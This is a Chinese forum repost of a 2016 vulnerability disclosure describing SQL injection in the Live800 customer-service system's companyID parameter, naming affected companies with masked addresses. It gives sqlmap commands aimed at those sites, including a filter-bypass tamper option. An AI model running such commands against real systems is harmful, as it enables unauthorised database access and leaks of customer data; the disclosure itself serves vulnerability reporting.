HanDs
管理员

[7月漏洞公开] Live800在线客服系统SQL注射漏洞 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

影响非常多牛逼的站,泄露大量敏感信息

详细说明:

经测试发现,以下链接存在漏洞

/live800/chatClient/preChatAskl.jsp

companyID参数没有过滤,造成了SQL注射

该漏洞影响了非常多的大型网站,给出几个测试证明

唯品会:

http://**.**.**.**/live800/

sqlmap.py -u "http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1" -p "companyID" --random-agent --technique=T --dbms=mysql

1.png





B%6S]OD}(HXH900W3VU)2AY.jpg



金蝶:

http://**.**.**.**/live800/

sqlmap.py -u "http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1" -p "companyID" --random-agent --technique=T --dbms=mysql

2.png



长安汽车:

http://**.**.**.**/live800/

sqlmap.py -u "http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1" -p "companyID" --random-agent --technique=T --dbms=mysql

3.png



其他以下案例:

http://**.**.**.**/live800/

http://**.**.**.**/live800/

http://**.**.**.**/live/

http://**.**.**.**/live800/

http://**.**.**.**/live800/

http://**.**.**.**/live800/

漏洞证明:

经测试发现,以下链接存在漏洞

/live800/chatClient/preChatAskl.jsp

companyID参数没有过滤,造成了SQL注射

该漏洞影响了非常多的大型网站,给出几个测试证明

做了相应过滤,加上--tamper “between.py”

唯品会:

http://**.**.**.**/live800/

sqlmap.py -u "http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1" -p "companyID" --random-agent --technique=T --dbms=mysql

1.png





B%6S]OD}(HXH900W3VU)2AY.jpg



金蝶:

http://**.**.**.**/live800/

sqlmap.py -u "http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1" -p "companyID" --random-agent --technique=T --dbms=mysql

2.png



长安汽车:

http://**.**.**.**/live800/

sqlmap.py -u "http://**.**.**.**/live800/chatClient/preChatAskl.jsp?companyID=1" -p "companyID" --random-agent --technique=T --dbms=mysql

3.png

修复方案:

过滤


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
Live800 在线客服系统 SQL 注射漏洞
#1楼
发帖时间:2016-7-19   |   查看数:0   |   回复数:0
游客组
快速回复